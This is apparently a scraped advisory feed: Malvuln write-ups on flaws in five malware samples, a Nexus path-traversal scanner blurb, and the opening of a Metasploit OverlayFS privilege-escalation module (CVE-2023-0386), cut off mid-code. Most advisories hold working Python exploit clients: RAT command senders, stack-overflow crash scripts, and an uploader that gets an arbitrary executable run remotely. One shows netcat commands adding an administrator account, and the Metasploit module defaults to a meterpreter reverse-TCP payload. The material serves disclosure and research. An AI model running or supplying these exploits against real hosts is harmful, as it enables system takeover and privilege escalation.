Backdoor.Win32.Benju.a malware suffers from a remote command execution vulnerability.  This is the 700th release of a malvuln finding.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/88922242e8805bfbc5981e55fdfadd71.txtContact: malvuln13@gmail.comMedia: x.com/malvuln Threat: Backdoor.Win32.Benju.aVulnerability: Unauthenticated Remote Command ExecutionFamily: BenjuType: PE32MD5: 88922242e8805bfbc5981e55fdfadd71SHA256: 7d34804173e09d0f378dfc8c9212fe77ff51f08c9d0b73d00a19b7045ddc1f0e Vuln ID: MVID-2024-0700Disclosure: 09/27/2024Description: The RAT listens on TCP ports 200 and 15000. Third-party adversaries who can reach an infected host, can execute commands made available by the malware. Commands are sent in Spanish, using netcat or telnet fails to run cmds after connecting as they send CRLFs e.g. "quitar\r\n" fails "quitar" succeeds. Therefore, we need a custom client to send commands to the Benju RAT.Reiniciado = rebootquitar = terminate backdoorcerrarsesion = shutdownEnciendemonitor = turn on monitorapagamonitor = monitor offOcultaiconos = hide iconsactivachat = open chat windowBloquearaton = block ratDesbloquearaton = unblock ratActivainicio = activate startcerrarsesion = logoutOcultaiconosConectadoOcultado los iconoscerrarsesionConectadoCerrado la sesion de windowsEnciendemonitorConectadoMonitor encendidoapagamonitorConectadoMonitor apagadoquitarConectadoPc desinfectadoExploit/PoC:from socket import *import time,sysCMD=["Reiniciado","Enciendemonitor","apagamonitor","Ocultaiconos","Activainicio",          "activachat","Bloquearaton","Desbloquearaton","cerrarsesion","quitar"]def chk_res(s):    res=""    while True:        res += s.recv(512).decode()        if res:            break    return resdef Benju_Over(MALWARE_HOST, PTR):        PORT=200    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    print(CMD[PTR])    s.send("".encode())    print(chk_res(s))    PAYLOAD= CMD[PTR]   #Don't send CRLFs    s.send(PAYLOAD.encode())    time.sleep(0.5)    print(chk_res(s))    s.close()    print("[*] Benju (over) Rat PoC by malvuln")if __name__=="__main__":    c=-1    if len(sys.argv) < 3:        print("[+] Benju (over) Rat PoC by malvuln")        print("[+] Greetz Edu_Braun_0day, Indoushka, Todd J")        print("[!] Usage: Infected IP, Command")        print("[-]=============================")        for x in CMD:            c+=1            print("[+] "+str(c) + " "+ x)            exit()    try:        MALWARE_HOST=sys.argv[1]        PTR=int(sys.argv[2])        if MALWARE_HOST and PTR:            Benju_Over(MALWARE_HOST, PTR)    except Exception as e:        print("[!] "+str(e))        exit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Benju.a MVID-2024-0700 Remote Command Execution

Backdoor.Win32.Prorat.jz malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/277f9a4db328476300c4da5f680902ea.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln 

Threat: Backdoor.Win32.Prorat.jz  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The RAT listens on TCP ports 51100,5112,5110 and runs an FTP service. Prorat uses a vulnerable component in a secondary malware it drops on the victim system named "Netbot_Attacker VIP 6.0 Version korea.exe" MD5: 2168a606464c7fd016c260140a62815e. The dropped malware listens on TCP port 8080 and 80 on subsequent restarts. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz to port 8080. This will trigger a stack buffer overflow overwriting the ECX, EIP registers and Structured Exception Handler (SEH).  
Family: Prorat  
Type: PE32  
MD5: 277f9a4db328476300c4da5f680902ea  
SHA256: 1134dffe52ea01f0d93a6889edd36620dbe9ee04224ad662e4f5463c4feb98a7   
Vuln ID: MVID-2024-0699  
Dropped files:  ~imsinst.exe, NetBot.ini  in  \AppData\Local\Temp directory.  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1974.354): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=00000000 esi=00000000 edi=00000002  
eip=76fced3c esp=0703f8d0 ebp=0703f910 iopl=0         nv up ei pl nz ac po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:008> .ecxr  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???

0:008> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Netbot_Attacker VIP 6.0 Version korea.exe  
*** ERROR: Module load completed but symbols could not be loaded for Netbot_Attacker VIP 6.0 Version korea.exe

FAULTING_IP:   
+2f  
41414141 ??              ???

EXCEPTION_RECORD:  0703fad0 -- (.exr 0x703fad0)  
ExceptionAddress: 41414141  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000000  
   Parameter[1]: 41414141  
Attempt to read from address 41414141

PROCESS_NAME:  Netbot_Attacker VIP 6.0 Version korea.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAILED_INSTRUCTION_ADDRESS:   
+2f  
41414141 ??              ???

CONTEXT:  0703fb20 -- (.cxr 0x703fb20)  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???  
Resetting default scope

READ_ADDRESS:  41414141 

FOLLOWUP_IP:   
+2f  
41414141 ??              ???

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 41414141 to 41414141

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN

IP_ON_HEAP:  41414141  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

STACK_TEXT:    
00000000 00000000 unknown!netbot_attacker_vip_6.0_version_korea.exe+0x0

STACK_COMMAND:  .cxr 000000000703FB20 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  unknown!netbot_attacker_vip_6.0_version_korea.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_c0000409_unknown!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_MISSING_GSFRAME_BAD_IP_unknown!netbot_attacker_vip_6.0_version_korea.exe

Followup: MachineOwner  
---------

0:008> !exchain  
0703f988: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=8080  #80 after initial restart

def Prorat_BOF():

    print("[+] Backdoor.Win32.Prorat.jz")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 277f9a4db328476300c4da5f680902ea")

        for i in range(1, 13):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="A"*100 * i  
        s.send(PAYLOAD.encode())  
        time.sleep(0.5)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    Prorat_BOF()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Prorat.jz MVID-2024-0699 Buffer Overflow

Backdoor.Win32.Amatu.a malware suffers from a remote arbitrary file write vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/1e2d0b90ffc23e00b743c41064bdcc6b.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Amatu.aVulnerability: Remote Arbitrary File Write (RCE)Family: AmatuType: PE32MD5: 1e2d0b90ffc23e00b743c41064bdcc6bSHA256: 77fff9931013ab4de6d4be66ca4fda47be37b6f706a7062430ee8133c7521297Vuln ID: MVID-2024-0698Dropped files: mine.exeDisclosure: 09/27/2024Description: The malware listens on TCP port 2121. Third-party adversaries who can reach an infected host, can write arbitrary executable code to a file named "mine.exe" to SysWOW64 directory. The mine.exe  PE file executes immediately and runs as a child of the parent process malware. Amatu calls several Win32 APIs "GetSystemDirectoryA", "CreateFileA" and "WriteFile" to save the inbound code to disk. Finally, it calls "ShellExecuteA" executing the arbitrary PE file sent by the attacker. Setup a gateway and fake DNS sinkhole to mimic outbound internet access for the C2 or the port may not open."Amatu.a" disassemblycall    ds:GetSystemDirectoryA004A1FCB                 lea     ecx, [ebp+Source]004A1FD1                 push    ecx             ; Source004A1FD2                 lea     edx, [ebp+Buffer]004A1FD8                 push    edx             ; Destination004A1FD9                 call    strcat004A1FDE                 add     esp, 8004A1FE1                 push    offset aMine    ; "mine"004A1FE6                 lea     eax, [ebp+Buffer]004A1FEC                 push    eax             ; Destination004A1FED                 call    strcat004A1FF2                 add     esp, 8004A1FF5                 push    offset aExe     ; ".exe"004A1FFA                 lea     ecx, [ebp+Buffer]004A2000                 push    ecx             ; Destination004A2001                 call    strcat004A2022                 call    ds:CreateFileA 004A206B                 call    recv.004A2070                 mov     [ebp+nNumberOfBytesToWrite], eax.004A2076                 cmp     [ebp+nNumberOfBytesToWrite], 0push    eax             ; lpNumberOfBytesWritten004A209C                 mov     ecx, [ebp+nNumberOfBytesToWrite]004A20A2                 push    ecx             ; nNumberOfBytesToWrite004A20A3                 lea     edx, [ebp+buf]004A20A9                 push    edx             ; lpBuffer004A20AA                 mov     eax, [ebp+hFile]004A20B0                 push    eax             ; hFile004A20B1                 call    ds:WriteFilemov     ecx, [ebp+hFile]004A20BF                 push    ecx             ; hObject004A20C0                 call    ds:CloseHandle004A20C6                 push    1               ; nShowCmd004A20C8                 push    0               ; lpDirectory004A20CA                 push    0               ; lpParameters004A20CC                 lea     edx, [ebp+Buffer]004A20D2                 push    edx             ; lpFile004A20D3                 push    offset Operation ; "open"004A20D8                 push    0               ; hwnd004A20DA                 call    ds:ShellExecuteA004A20E0                 mov     eax, [ebp+s]004A20E3                 push    eax             ; s004A20E4                 call    closesocketExploit/PoC:1) Create a small PE file named "mine.exe", I used MASM and packed it with FSG."mine.exe" include \masm32\include\masm32rt.inc.dataHATE db "Masm32:", 0MyReal8 REAL8 123.456.data?aDword dd ?.codestart:  invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK  mov eax, 123  exitend start2) Our custom client to send "mine.exe" to the remote infected host.from socket import *MALWARE_HOST="x.x.x.x"PORT=2121DOOM="mine.exe" def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Amatu.a MVID-2024-0698 Arbitrary File Write

Backdoor.Win32.Agent.pw malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/68dd7df213674e096d6ee255a7b90088.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Agent.pw  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 21111. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz triggering a stack buffer overflow overwriting the ECX, EDI registers and Structured Exception Handler (SEH). Sending a packet containing the ascii character "A" or "41", registers are overwritten with "3431" as 4 is 34 hex and 1 is 31 hex. The lowercase character "R" consistently triggers an access violation with registers being overwritten with "r" 72 hex.  
Family: Agent  
Type: PE32  
MD5: 68dd7df213674e096d6ee255a7b90088  
SHA256: 2ba1d27325224407b6d57e0e8d141e3f301225d18a68bb5380c46287a0fc4441  
Vuln ID: MVID-2024-0697  
Dropped files:   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1f90.1888): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=72727272 edx=040b1a3c esi=00000000 edi=00000002  
eip=76fced3c esp=0019de98 ebp=0019ded8 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:000> .ecxr  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

EXCEPTION_RECORD:  0019e09c -- (.exr 0x19e09c)  
ExceptionAddress: 00411515 (Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x00011515)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 72727276  
Attempt to write to address 72727276

PROCESS_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019e0ec -- (.cxr 0x19e0ec)  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????  
Resetting default scope

WRITE_ADDRESS:  72727276 

FOLLOWUP_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

FAULTING_THREAD:  00001888

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

LAST_CONTROL_TRANSFER:  from 0040c987 to 00411515

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019e56c 0040c987 025805a8 0000003f 0019e5bc Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515  
0019e768 72727272 72727272 72727272 72727272 Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0xc987  
0019e76c 72727272 72727272 72727272 72727272 0x72727272  
0019e770 72727272 72727272 72727272 72727272 0x72727272  
0019e774 72727272 72727272 72727272 72727272 0x72727272  
0019e778 72727272 72727272 72727272 72727272 0x72727272  
0019e77c 72727272 72727272 72727272 72727272 0x72727272  
0019e780 72727272 72727272 72727272 72727272 0x72727272  
0019e784 72727272 72727272 72727272 72727272 0x72727272  
0019e788 72727272 72727272 72727272 72727272 0x72727272  
0019e78c 72727272 72727272 72727272 72727272 0x72727272  
0019e790 72727272 72727272 72727272 72727272 0x72727272  
0019e794 72727272 72727272 72727272 72727272 0x72727272  
0019e798 72727272 72727272 72727272 72727272 0x72727272  
0019e79c 72727272 72727272 72727272 72727272 0x72727272  
0019e7a0 72727272 72727272 72727272 72727272 0x72727272  
0019e7a4 72727272 72727272 72727272 72727272 0x72727272  
0019e7a8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ac 72727272 72727272 72727272 72727272 0x72727272  
0019e7b0 72727272 72727272 72727272 72727272 0x72727272  
0019e7b4 72727272 72727272 72727272 72727272 0x72727272  
0019e7b8 72727272 72727272 72727272 72727272 0x72727272  
0019e7bc 72727272 72727272 72727272 72727272 0x72727272  
0019e7c0 72727272 72727272 72727272 72727272 0x72727272  
0019e7c4 72727272 72727272 72727272 72727272 0x72727272  
0019e7c8 72727272 72727272 72727272 72727272 0x72727272  
0019e7cc 72727272 72727272 72727272 72727272 0x72727272  
0019e7d0 72727272 72727272 72727272 72727272 0x72727272  
0019e7d4 72727272 72727272 72727272 72727272 0x72727272  
0019e7d8 72727272 72727272 72727272 72727272 0x72727272  
0019e7dc 72727272 72727272 72727272 72727272 0x72727272  
0019e7e0 72727272 72727272 72727272 72727272 0x72727272  
0019e7e4 72727272 72727272 72727272 72727272 0x72727272  
0019e7e8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ec 72727272 72727272 72727272 72727272 0x72727272  
0019e7f0 72727272 72727272 72727272 72727272 0x72727272  
0019e7f4 72727272 72727272 72727272 72727272 0x72727272  
0019e7f8 72727272 72727272 72727272 72727272 0x72727272  
0019e7fc 72727272 72727272 72727272 72727272 0x72727272  
0019e800 72727272 72727272 72727272 72727272 0x72727272  
0019e804 72727272 72727272 72727272 72727272 0x72727272  
0019e808 72727272 72727272 72727272 72727272 0x72727272  
0019e80c 72727272 72727272 72727272 72727272 0x72727272  
0019e810 72727272 72727272 72727272 72727272 0x72727272  
0019e814 72727272 72727272 72727272 72727272 0x72727272  
0019e818 72727272 72727272 72727272 72727272 0x72727272  
0019e81c 72727272 72727272 72727272 72727272 0x72727272  
0019e820 72727272 72727272 72727272 72727272 0x72727272  
0019e824 72727272 72727272 72727272 72727272 0x72727272  
0019e828 72727272 72727272 72727272 72727272 0x72727272  
0019e82c 72727272 72727272 72727272 72727272 0x72727272  
0019e830 72727272 72727272 72727272 72727272 0x72727272  
0019e834 72727272 72727272 72727272 72727272 0x72727272  
0019e838 72727272 72727272 72727272 72727272 0x72727272  
0019e83c 72727272 72727272 72727272 72727272 0x72727272  
0019e840 72727272 72727272 72727272 72727272 0x72727272  
0019e844 72727272 72727272 72727272 72727272 0x72727272  
0019e848 72727272 72727272 72727272 72727272 0x72727272  
0019e84c 72727272 72727272 72727272 72727272 0x72727272  
0019e850 72727272 72727272 72727272 72727272 0x72727272  
0019e854 72727272 72727272 72727272 72727272 0x72727272  
0019e858 72727272 72727272 72727272 72727272 0x72727272  
0019e85c 72727272 72727272 72727272 72727272 0x72727272  
0019e860 72727272 72727272 72727272 72727272 0x72727272  
0019e864 72727272 72727272 72727272 72727272 0x72727272  
0019e868 72727272 72727272 72727272 72727272 0x72727272  
0019e86c 72727272 72727272 72727272 72727272 0x72727272  
0019e870 72727272 72727272 72727272 72727272 0x72727272  
0019e874 72727272 72727272 72727272 72727272 0x72727272  
0019e878 72727272 72727272 72727272 72727272 0x72727272  
0019e87c 72727272 72727272 72727272 72727272 0x72727272  
0019e97c 76fa665c 0019ea68 001a1758 000007a0 0x72727272  
0019e9e0 76fa01a3 b8e17520 04394df0 04390000 ntdll!RtlpFindUnicodeStringInSection+0x19c  
0019ea14 00000000 00000003 00000000 0000003b ntdll!RtlpFreeHeap+0x723

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088

IMAGE_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  4228698c

STACK_COMMAND:  .cxr 0x19e0ec ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272_c0000409_Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272_MISSING_GSFRAME_Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

Followup: MachineOwner  
---------

0:000> !exchain  
0019df50: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
0019e8f8: 72727272  
Invalid exception stack at 72727272

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=21111  

def doit():  
    print("[+] Backdoor.Win32.Agent.pw")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 68dd7df213674e096d6ee255a7b90088")

    for i in range(1, 16):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="r"*512 * i   
        s.send(PAYLOAD.encode())  
        time.sleep(0.3)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    doit()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.pw MVID-2024-0697 Buffer Overflow

Backdoor.Win32.Boiling malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/80cb490e5d3c4205434850eff6ef5f8f.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BoilingVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 4369. Third party adversaries who can reach an infected host, can issue single OS commands to takeover the system undermining the initial infection.Family: BoilingType: PE32MD5: 80cb490e5d3c4205434850eff6ef5f8fSHA256: cbaefa79eb48d893426d438b48ca0fc6e7f6f4a6810b9c1e76bf625b69a609e1Vuln ID: MVID-2024-0696Disclosure: 09/27/2024Exploit/PoC:nc64.exe x.x.x.x 4369calcOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net user hyp3rlinx 666 /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net localgroup administrators hyp3rlinx /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369ping 8.8.8.8 > out.txtOK, Success in Execute Commandúshutdown -fOK, Success in Execute CommandúDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Boiling MVID-2024-0696 Code Execution

This scanner helps security enthusiasts to scan for a path traversal vulnerability in Nexus Repository targets in bulk. The scanner will show the number of targets loaded and the state of the current scanning. The URLs will be listed with three status messages: Timeout, Fail, or Success, based on the results.

Nexus Repository Traversal Scanner

This Metasploit module exploit targets the Linux kernel bug in OverlayFS. A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::File  include Msf::Post::Linux::Priv  include Msf::Post::Linux::Kernel  include Msf::Post::Linux::System  include Msf::Post::Linux::Compile  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Local Privilege Escalation via CVE-2023-0386',        'Description' => %q{          This exploit targets the Linux kernel bug in OverlayFS.          A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities          was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount.          This uid mapping bug allows a local user to escalate their privileges on the system.        },        'License' => MSF_LICENSE,        'Author' => [          'xkaneiki', # Exploit development          'sxlmnwb', # Exploit development          'Takahiro Yokoyama', # Metasploit Module        ],        'DisclosureDate' => '2023-03-22',        'SessionTypes' => ['shell', 'meterpreter'],        'Platform' => [ 'linux' ],        'Arch' => [          ARCH_X64,        ],        'Targets' => [['Automatic', {}]],        'DefaultTarget' => 0,        'DefaultOptions' => {          'AppendExit' => true,          'PrependFork' => true,          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'        },        'Privileged' => true,        'References' => [          [ 'CVE', '2023-0386' ],          [ 'URL', 'https://github.com/sxlmnwb/CVE-2023-0386' ],          [ 'URL', 'https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/overlayfs-cve-2023-0386' ],          [ 'URL', 'https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/' ],          [ 'URL', 'https://www.vicarius.io/vsociety/posts/cve-2023-0386-a-linux-kernel-bug-in-overlayfs' ],        ],        'Notes' => {          'Reliability' => [ REPEATABLE_SESSION ],          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK ]        }      )    )    register_options([      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),      OptInt.new('TIMEOUT', [ true, 'Timeout for exploit (seconds)', '60' ])    ])    register_advanced_options([      